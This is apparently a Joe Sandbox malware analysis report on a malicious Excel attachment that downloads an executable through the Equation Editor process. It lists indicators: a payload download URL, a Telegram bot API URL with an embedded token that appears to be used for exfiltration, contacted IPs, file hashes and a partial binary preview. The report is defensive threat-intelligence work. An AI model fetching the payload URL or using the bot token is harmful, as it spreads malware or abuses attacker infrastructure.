                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://pkusukoharjo.com/yEQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://pkusukoharjo.com/giving/qGTGx.exejdbSYXB9S.Pu6cLfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://pkusukoharjo.com/EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, powershell_ise.exe, 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        		high
                        https://pkusukoharjo.com/giving/qGTGx.exejjC:EQNEDT32.EXE, 00000002.00000002.996175505.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://cdn.discordapp.comjhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://109.206.241.81Pjhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1007008986.0000000002443000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                162.159.129.233
                                		cdn.discordapp.comUnited States
                                		13335CLOUDFLARENETUSfalse
                                136.243.86.20
                                		pkusukoharjo.comGermany
                                		24940HETZNER-ASDEtrue
                                109.206.241.81
                                		unknownGermany
                                		209929AWMLTNLfalse

                                General Information

                                Joe Sandbox Version:35.0.0 Citrine
                                Analysis ID:679189
                                Start date and time: 05/08/202211:39:582022-08-05 11:39:58 +02:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 8m 20s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:Contract - Wipak Oy.xlsx
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:9
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winXLSX@8/6@2/3
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 92%
                                • Number of executed functions: 63
                                • Number of non-executed functions: 1
                                Cookbook Comments:
                                • Found application associated with file extension: .xlsx
                                • Adjust boot time
                                • Enable AMSI
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Active ActiveX Object
                                • Scroll down
                                • Close Viewer

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.89.179.12, 104.208.16.93
                                • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, legacywatson.trafficmanager.net, onedsblobprdcus17.centralus.cloudapp.azure.com
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                11:41:53API Interceptor134x Sleep call for process: EQNEDT32.EXE modified
                                11:42:01API Interceptor49x Sleep call for process: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe modified
                                11:42:07API Interceptor85x Sleep call for process: powershell_ise.exe modified
                                11:42:07API Interceptor105x Sleep call for process: dw20.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                162.159.129.233SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin
                                64AE5410F978DF0F48DCC67508820EA230C566967E002.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                http://162.159.129.233Get hashmaliciousBrowse
                                • 162.159.129.233/favicon.ico
                                2lfV6QiE6j.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/937614907917078588/937618926945329213/macwx.log
                                SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
                                1PhgF7ujwW.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
                                vhNyVU8USk.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
                                Order 4503860408.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/809311531652087809/839376179840286770/originbot4.0.exe
                                cotizacin.docGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/812102734177763331/819187064415191071/bextrit.exe
                                SecuriteInfo.com.PWS-FCXDF96A01717A58.15363.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/819169403979038784/819184830453514270/fraem.exe
                                7G5RoevPnu.exeGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/807746340997431316/809208342068199434/118fir2crtg.exe
                                70% Balance Payment.docGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/785631384156110868/785631871395561492/italianmassloga.exe
                                TT20201712.docGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
                                ENQ-015August 2020 R1 Proj LOT.docGet hashmaliciousBrowse
                                • cdn.discordapp.com/attachments/722888184203051118/757862128198877274/Stub.jpg

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                cdn.discordapp.com3CzQDO1WLI.exeGet hashmaliciousBrowse
                                • 162.159.133.233
                                57lsAxwpQZ.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                DOCUMENTO DE IMPUESTO PREDIAL.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
                                • 162.159.129.233
                                Plasma.exeGet hashmaliciousBrowse
                                • 162.159.135.233
                                e4.exeGet hashmaliciousBrowse
                                • 162.159.129.233
                                GnyGIMOLwK.exeGet hashmaliciousBrowse
                                • 162.159.133.233
                                AxseMjBluY.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                t3uEMr422v.exeGet hashmaliciousBrowse
                                • 162.159.129.233
                                EU-Business-Register_pdf.exeGet hashmaliciousBrowse
                                • 162.159.134.233
                                File.exeGet hashmaliciousBrowse
                                • 162.159.135.233
                                Lithoprint.exeGet hashmaliciousBrowse
                                • 162.159.133.233
                                0372Y591445-20220802-10842,00-USD-SWIFT MESAJI.exeGet hashmaliciousBrowse
                                • 162.159.135.233
                                uED2AIUn6R.exeGet hashmaliciousBrowse
                                • 162.159.133.233
                                e733cbcaee33c4e99d99f2a3b82e2530e10dac7106edf.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                aTlGCwT504.exeGet hashmaliciousBrowse
                                • 162.159.129.233
                                a880ebe9be4e9888ac2faa331c390b5d477fc828bf2e6.exeGet hashmaliciousBrowse
                                • 162.159.129.233
                                PO 7500093232.exeGet hashmaliciousBrowse
                                • 162.159.135.233
                                System.Activities.exeGet hashmaliciousBrowse
                                • 162.159.135.233
                                SOA for July.exeGet hashmaliciousBrowse
                                • 162.159.133.233

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                CLOUDFLARENETUS3WdlXj8suM.exeGet hashmaliciousBrowse
                                • 104.18.115.97
                                3CzQDO1WLI.exeGet hashmaliciousBrowse
                                • 162.159.133.233
                                http://aftral.comrgkxeaj7rpiqoyj25vnt-rgkxeaj7rpiqoyj25vnt.waurwors.com/pwd.php#anVsaWVuLmh1YmVyZGVhdUBhZnRyYWwuY29tGet hashmaliciousBrowse
                                • 104.17.25.14
                                DT5a7gQIfc.exeGet hashmaliciousBrowse
                                • 188.114.96.3
                                Lg3gn9y1Cj.exeGet hashmaliciousBrowse
                                • 104.18.114.97
                                57lsAxwpQZ.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                RevisedSalesContractINV.htmlGet hashmaliciousBrowse
                                • 104.18.11.207
                                eeee.hTmLGet hashmaliciousBrowse
                                • 104.18.10.207
                                http://r.email.rdv360.com/tr/cl/tl7Wu25UHrnjkn5sfc0vx0u4dtyo0w00PXMuL2iagRDUR4r6sEL0l9C97pb-2sRztT-v8bXx-XwXmfdSPRXPxbz7LHu0VNziyeYAzkCiIjcvnS7WBSJwBh3b5lynhLuGZ-icKIPKLG1_Nge8zb9RKR3x8-eqdE9Z6NZ1eNGz7xHfVQji-8Y3Ly2KhJRTjnC_XVffoO3v2wTAX7vCTKg95DV-fGkRhyk0Etop2L_GVfVQwjhA4X5PZ4rHEGj4_1HhHvnPUbiBjyJo5lqUbQIGet hashmaliciousBrowse
                                • 172.67.74.163
                                DOCUMENTO DE IMPUESTO PREDIAL.exeGet hashmaliciousBrowse
                                • 162.159.134.233
                                Q3 Bonus1.HTMlGet hashmaliciousBrowse
                                • 104.17.25.14
                                Secured_angela.johnson_Audio_Message.htmGet hashmaliciousBrowse
                                • 172.64.145.85
                                SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
                                • 162.159.129.233
                                https://www.frontrush.com/FR_Web_App/Message/MessageTracking.aspx?code=ODYzOTUxNTsyNjM3ODcyODtSOzgxOTc7TA==-f+lhm4TMRSg=&redir=http://4267.s1oAXteFRf.beyondsm.com/?=accountsreceivable@seven.com.auGet hashmaliciousBrowse
                                • 104.17.25.14
                                .htmlGet hashmaliciousBrowse
                                • 104.18.11.207
                                https://securb0a.top/Get hashmaliciousBrowse
                                • 188.114.97.3
                                https://test.katatillo.com/wp-content/wp-contacto/h0k3ts/redir/?m=reena_sood@hotmail.com/Get hashmaliciousBrowse
                                • 172.67.70.233
                                https://drive.google.com/file/d/16SdQLnBJ6tLnj432P6jDRNRwgR6JpZ7c/view?usp=sharingGet hashmaliciousBrowse
                                • 104.18.6.145
                                https://app.pandadoc.com/p/68c56729e1766ba3c2c45de9e71ef2844a97cabc?Get hashmaliciousBrowse
                                • 104.19.154.83
                                xd.x86Get hashmaliciousBrowse
                                • 8.46.48.22
                                HETZNER-ASDEORDER Wipak - OY 89479444.xlsxGet hashmaliciousBrowse
                                • 136.243.86.20
                                RFQ - 0740089380 WIpak Oy July.xlsxGet hashmaliciousBrowse
                                • 136.243.86.20
                                2OmglUwx83.exeGet hashmaliciousBrowse
                                • 49.12.9.140
                                GI3I8IbuVE.exeGet hashmaliciousBrowse
                                • 49.12.9.140
                                PtfqFnZtxB.exeGet hashmaliciousBrowse
                                • 116.202.183.213
                                7C2P2CKtTz.exeGet hashmaliciousBrowse
                                • 116.202.183.213
                                jeqBDEzDeE.exeGet hashmaliciousBrowse
                                • 116.202.183.213
                                vxSBCLoYso.exeGet hashmaliciousBrowse
                                • 116.202.183.213
                                51BF4Ql66U.exeGet hashmaliciousBrowse
                                • 116.202.183.213
                                e4.exeGet hashmaliciousBrowse
                                • 148.251.234.83
                                http://derweekge.com/vento/6523.exeGet hashmaliciousBrowse
                                • 148.251.234.83
                                ulRYla6dh8.exeGet hashmaliciousBrowse
                                • 116.202.183.213
                                IrPYliXpsE.exeGet hashmaliciousBrowse
                                • 116.202.183.213
                                SecuriteInfo.com.W32.AIDetectNet.01.17067.exeGet hashmaliciousBrowse
                                • 144.76.136.153
                                X0De3Qm2Ds.exeGet hashmaliciousBrowse
                                • 116.202.183.213
                                3zq7lZXEzv.exeGet hashmaliciousBrowse
                                • 116.202.183.213
                                TFs61cHvij.exeGet hashmaliciousBrowse
                                • 148.251.234.83
                                http://clonyjohn.comGet hashmaliciousBrowse
                                • 95.216.10.178
                                File.exeGet hashmaliciousBrowse
                                • 148.251.234.93
                                SecuriteInfo.com.W32.AIDetectNet.01.23090.exeGet hashmaliciousBrowse
                                • 5.161.134.83

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                7dcce5b76c8b17472d024758970a406bORDER Wipak - OY 89479444.xlsxGet hashmaliciousBrowse
                                • 136.243.86.20
                                RFQ - 0740089380 WIpak Oy July.xlsxGet hashmaliciousBrowse
                                • 136.243.86.20
                                2TNI4tecBe.docxGet hashmaliciousBrowse
                                • 136.243.86.20
                                FA0000017284..docxGet hashmaliciousBrowse
                                • 136.243.86.20
                                https://www.evernote.com/shard/s551/sh/f0e07909-8f15-8726-68d2-99b1153d02f2/5d2b75f789fe653c6d0cc061b861b114Get hashmaliciousBrowse
                                • 136.243.86.20
                                ACH_WIRE_REMITTANCE.xlsxGet hashmaliciousBrowse
                                • 136.243.86.20
                                2_202208329496808197.xlsmGet hashmaliciousBrowse
                                • 136.243.86.20
                                4_202208782733399536.xlsmGet hashmaliciousBrowse
                                • 136.243.86.20
                                9_202208511985921120.xlsmGet hashmaliciousBrowse
                                • 136.243.86.20
                                Invoice August 2022 DSC.htmlGet hashmaliciousBrowse
                                • 136.243.86.20
                                ACH_WIRE_REMITTANCE.xlsxGet hashmaliciousBrowse
                                • 136.243.86.20
                                Pago.xlsGet hashmaliciousBrowse
                                • 136.243.86.20
                                ACH_WIRE_REMITTANCE.xlsxGet hashmaliciousBrowse
                                • 136.243.86.20
                                QAF2022-1553 EF.xlsxGet hashmaliciousBrowse
                                • 136.243.86.20
                                SPM Strength_Vessel's Certificate.xlsxGet hashmaliciousBrowse
                                • 136.243.86.20
                                W23578.xlsxGet hashmaliciousBrowse
                                • 136.243.86.20
                                ACH_WIRE_REMITTANCE.xlsxGet hashmaliciousBrowse
                                • 136.243.86.20
                                payment for invoice 64249.docxGet hashmaliciousBrowse
                                • 136.243.86.20
                                PO-10152022.docxGet hashmaliciousBrowse
                                • 136.243.86.20
                                QUOTE # EM067022.docxGet hashmaliciousBrowse
                                • 136.243.86.20
                                36f7277af969a6947a61ae0b815907a1yHYWC.exeGet hashmaliciousBrowse
                                • 162.159.129.233
                                Payment_Advice.docxGet hashmaliciousBrowse
                                • 162.159.129.233
                                NEWXORDERX16778612022.xlsxGet hashmaliciousBrowse
                                • 162.159.129.233
                                PI 120003638 - CFR R#U00c9VIS#U00c9.xlsxGet hashmaliciousBrowse
                                • 162.159.129.233
                                RFQ_07202022.docGet hashmaliciousBrowse
                                • 162.159.129.233
                                #U041f#U0440#U043e#U0435#U043a#U0442.exeGet hashmaliciousBrowse
                                • 162.159.129.233
                                Purchase Order 1.docGet hashmaliciousBrowse
                                • 162.159.129.233
                                BL Original Shipping Doc.xlsxGet hashmaliciousBrowse
                                • 162.159.129.233
                                BL-220712-001 & PACKING LIST.xlsxGet hashmaliciousBrowse
                                • 162.159.129.233
                                TITOL EURO 7280 PAYMENT RECIPE.docGet hashmaliciousBrowse
                                • 162.159.129.233
                                Att_file.xlsxGet hashmaliciousBrowse
                                • 162.159.129.233
                                Purchase order 2.xlsxGet hashmaliciousBrowse
                                • 162.159.129.233
                                Dhlinvoice.xlsxGet hashmaliciousBrowse
                                • 162.159.129.233
                                Electronic Funds TT.xlsxGet hashmaliciousBrowse
                                • 162.159.129.233
                                PO.xlsxGet hashmaliciousBrowse
                                • 162.159.129.233
                                #30062022 PAYMENT FM.xlsxGet hashmaliciousBrowse
                                • 162.159.129.233
                                Nordre Follo_MomSmartClient_x64.msiGet hashmaliciousBrowse
                                • 162.159.129.233
                                T3yEmiknvv.exeGet hashmaliciousBrowse
                                • 162.159.129.233
                                BL shipping documents.xlsxGet hashmaliciousBrowse
                                • 162.159.129.233
                                proforma invoice.xlsxGet hashmaliciousBrowse
                                • 162.159.129.233

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\qGTGx[1].exe

                                Download File
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:downloaded
                                Size (bytes):8704
                                Entropy (8bit):4.812551859843081
                                Encrypted:false
                                SSDEEP:96:5PM1Y6CB0C0st2AbUCAb17mF3lIpDXHo2rbwCiCeQhULtgAwsMIkGTp9rQEkrGi4:SAT0st2MUQIN42rSCekUL+VtvC
                                MD5:6D370555D43F89189867FD72222C6059
                                SHA1:79505977A7B45050A45BC4B715B21DF8F49AA3F1
                                SHA-256:41BF0E9B141CB3541CE14CA9DE7F606FD30C20E02CE95936F41FB728BD6C2232
                                SHA-512:48A97F522BD2DDD2704093917B4E19DC48726F650FD0DB496EE6D6BEE7CDD87CE089ADC8076EF1BD8D1401B100D81A50D2025AF8C061955DD740BA01056AC5EC
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Reputation:low
                                IE Cache URL:https://pkusukoharjo.com/giving/qGTGx.exe
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.............................7... ...@....@.. ....................................@..................................7..W....@.......................`......L6............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................7......H.......|"...............................................................0..........s........o.....Y................0Yr...p...o....(....(.......o....(....jai(....(.........o....&...o.....Y3....+....X....X.+..o....*...0...........(....s......(.....#........(.... ....(....r...pr...p(.....r...pr...p(.......o....(................r4..p....~..........o..........r...p...........r...p...(....o ...r...p...........r*..p...(.... ........t....o!...&.("......,..o#....*................Z(%.

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84E7CB3E.png

                                Download File
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 410 x 243, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):8217
                                Entropy (8bit):7.81503617702935
                                Encrypted:false
                                SSDEEP:192:kls9+/gQllKX6BrlzeHQbj4D24m1hcfxCEKSPALL78koM:kls9+NllKX6BhSH0j4Dxm1CfEEKSPA/T
                                MD5:A9CA5EE503B10E01BE979F0843A1F65F
                                SHA1:52E1FFFBDA428BD216AE62586E39AC1C20FC25C5
                                SHA-256:653F8662E65E224B05605B256BB4F6DE5F29F2B155DC4477635B8E43024503E4
                                SHA-512:07C64C4AFF76AEF6A76491184E1823C2FD2CBD1536C3D771B14CC887B7853074F6AC93EDBB1C58F38893B95D03FF2E17E30E66FF9F3334441788728EA1F8272F
                                Malicious:false
                                Reputation:low
                                Preview:.PNG........IHDR.............0.G.....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....pHYs..........o.d....bKGD..............IDATx..yX...9....pk.U{...Z7.)......|.h?.Z.fmm....ZE.UqC.@.T6..E.}../.B...l.....e.1d!!.....si23...;s..;.L..%0.....1cF.....Zb.YYY...].z./...x.........{.G:#....].v.3..A.d..........:.z...Dd). .K...c.Z!..U....DT). ..MX.=jG....NF.!....3..+...{..G...@H.}.2 ...?.|*.. ..^..3.?y.....G...@`.=R.Pgt...[. ..^..t.4.-...G.....f....#....2Kg..%.D...J......)J....5J<.p8.+..%....Gs.>[Z.-T..^M.:;._. ..^.,.............K.st.s..&.]...;.Uz.+>.rf.{...-..*^..k..3.A....p.......>.t..r#C.)....Z.}4.....~';A...W...3..\..--N...&.sv.X-.&n.+;%. ..Yne&5z.r.a<..#|...c...D.r.|=.......M........y...?|...G.....F..M..*...tf..J.(.A...tV.lw.Q&.v70...?.KVX"g.Z...Q.[6...Q<.q...#.x..\....y*:;..KE.;p..5.;..............j7_.(..ZZS...g.s.:....2.@.u.&..B.d.g.Q..;]?.\...,z.z...u.t&^....:.H........T..E.#t..I.'.;0..J(.-....F...+.{... .&d......

                                C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_powershell_ise.e_21ed43beb8f55ccf28a91ce407abfb7d5b6e611_02d11d32\Report.wer

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.6399755325948338
                                Encrypted:false
                                SSDEEP:96:6BCfkZJGUWs+xLuK5QXIW2zgBmBPUPZApIvY8rHvMpEWi7uyPV6VcRF9xdc79M8w:6kfv4gz5iyXg9uQxlAdWdSIy
                                MD5:17415515AD0E30C922DD9F6DEE28CF59
                                SHA1:C7F953A80317699B00D7072E9C5973D7BD7A6199
                                SHA-256:8F9E3D9197B50DFAE8987F1ED7D2EDECAF2D284B5A3A5F646E861EB3ADEF4272
                                SHA-512:D91195B73ED8667F3AB6DD3D40F1CD1C4772E7022CDEB9F5C5A471EB3212A2C227DD907FC3082E9CD4DE55943DEF520A448285957BEA20E4BE3D92FD5C3C08BC
                                Malicious:false
                                Reputation:low
                                Preview:V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.4.1.9.8.5.2.7.5.7.4.9.5.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.4.1.9.8.5.3.3.7.2.1.3.3.2.3.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.e.4.0.d.d.5.9.-.1.4.e.e.-.1.1.e.d.-.a.6.2.0.-.e.c.f.4.b.b.b.5.9.1.5.b.....W.O.W.6.4.=.1.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.I.d.=.1.5.5.2.1.7.5.6.7.5.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.T.a.b.l.e.=.5.0.4.3.5.1.7.5.0.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.P.r.o.b.l.e.m. .S.i.g.n.a.t.u.r.e. .0.1.....S.i.g.[.0.]...V.a.l.u.e.=.p.o.w.e.r.s.h.e.l.l._.i.s.e...e.x.e.....S.i.g.[.1.]...N.a.m.e.=.P.r.o.b.l.e.m. .S.i.g.n.a.t.u.r.e. .0.2.....S.i.g.[.1.]...V.a.l.u.e.=.0...0...0...0.....S.i.g.[.2.]...N.a.m.e.=.P.r.o.b.l.e.m. .S.i.g.n.a.t.u.r.e. .0.3.....S.i.g.[.2.]...V.a.l.u.e.=.6.2.d.e.5.4.9.3.....S.i.g.[.3.]...N.a.m.e.=.P.r.o.b.l.e.m. .S.i.g.n.a.t.u.r.e. .0.4.....S.i.g.[.3.]...V.a.l.u.e.=.S.y.s.t.e.m.....S.i.g.[.4.].

                                C:\Users\user\AppData\Local\Temp\WER1334.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2628
                                Entropy (8bit):3.6609345877607806
                                Encrypted:false
                                SSDEEP:48:yeRipPp6uhzrkG/wU6Gww7VxpAFgYkbkiQG5zO8ewLK/KDtHw+PjsMS+Mb6x24SQ:Shz4tU6o7VxBt33Ob83jt3
                                MD5:6B0C7E04A7A8FC222E8CDBAE62FC4423
                                SHA1:E2127ABC15302B905312214B336FC528AB27A722
                                SHA-256:65E62AD5061F3D8AF644696AAE22C80F608357A3CBB303D3EF0AE5C376E408E3
                                SHA-512:F1BC810A00F079F86DB82E72E0724CC54B1C024785C884937B86209898952BCBA705D8DA6B07701F9C7CCCD0FE30D1BC3E0506321036DDAE1CC14C5F46E7EB6F
                                Malicious:false
                                Reputation:low
